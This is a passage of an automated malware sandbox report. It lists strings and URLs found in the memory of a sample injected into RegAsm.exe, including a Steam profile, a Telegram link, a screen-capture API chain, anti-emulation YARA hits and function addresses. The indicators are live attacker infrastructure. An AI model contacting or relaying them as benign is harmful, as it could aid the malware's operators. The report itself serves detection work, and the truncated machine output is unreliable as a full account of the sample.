                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=roSu
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=sV4C07YVtT0V&amp
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/r
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/toolt
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                  Source: IEHJJE.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: IEHJJE.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: IEHJJE.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://help.steampowered.com/en/
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199680449169
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/market/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: file.exe, 00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2880922498.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680449169
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199680449169/badges
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199680449169/inventory/
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/about/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/explore/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/legal/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/mobile
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/news/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/stats/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.comv
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp, HDBKJE.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: HDBKJE.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp, HDBKJE.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: HDBKJE.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                  Source: file.exe, 00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/r1g1o
                  Source: file.exeString found in binary or memory: https://www.digicert.com/CPS0
                  Source: IEHJJE.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: IEHJJE.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownHTTPS traffic detected: 104.105.90.131:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004102E8 _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,1_2_004102E8

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.3d65570.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.3d65570.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02D20C380_2_02D20C38
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02D20C280_2_02D20C28
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02D2099F0_2_02D2099F
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02D209B00_2_02D209B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041B0AA1_2_0041B0AA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041D1C01_2_0041D1C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041AB591_2_0041AB59
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041BCD71_2_0041BCD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4A4CF01_2_1B4A4CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4920181_2_1B492018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5B9A201_2_1B5B9A20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5459401_2_1B545940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B491C9E1_2_1B491C9E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B492AA91_2_1B492AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4912A81_2_1B4912A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B49292D1_2_1B49292D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5F9CC01_2_1B5F9CC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5253B01_2_1B5253B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4935801_2_1B493580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B66D2091_2_1B66D209
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5B50401_2_1B5B5040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4A90001_2_1B4A9000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B54D6D01_2_1B54D6D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5396901_2_1B539690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5F94301_2_1B5F9430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B594A601_2_1B594A60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B491EF11_2_1B491EF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4B8D2A1_2_1B4B8D2A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B493AB21_2_1B493AB2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5181201_2_1B518120
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5B80301_2_1B5B8030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5100901_2_1B510090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4B87631_2_1B4B8763
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4F47601_2_1B4F4760
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5287601_2_1B528760
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4B86801_2_1B4B8680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5D04801_2_1B5D0480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4BBAB01_2_1B4BBAB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B49251D1_2_1B49251D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B49290A1_2_1B49290A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4C33701_2_1B4C3370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B49F1601_2_1B49F160
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B49174E1_2_1B49174E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B49AA401_2_1B49AA40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B49EA801_2_1B49EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B58A9401_2_1B58A940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5AA9001_2_1B5AA900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5769C01_2_1B5769C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B493E3B1_2_1B493E3B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5CE8001_2_1B5CE800
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B49481D1_2_1B49481D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4F2EE01_2_1B4F2EE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4D6E801_2_1B4D6E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B66AEBE1_2_1B66AEBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4919DD1_2_1B4919DD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B51A0B01_2_1B51A0B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B49209F1_2_1B49209F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4A66C01_2_1B4A66C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4BA5601_2_1B4BA560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B58A5901_2_1B58A590
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4947AF1_2_1B4947AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1B49415B appears 133 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1B491C2B appears 47 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004024F9 appears 312 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1B49395E appears 78 times
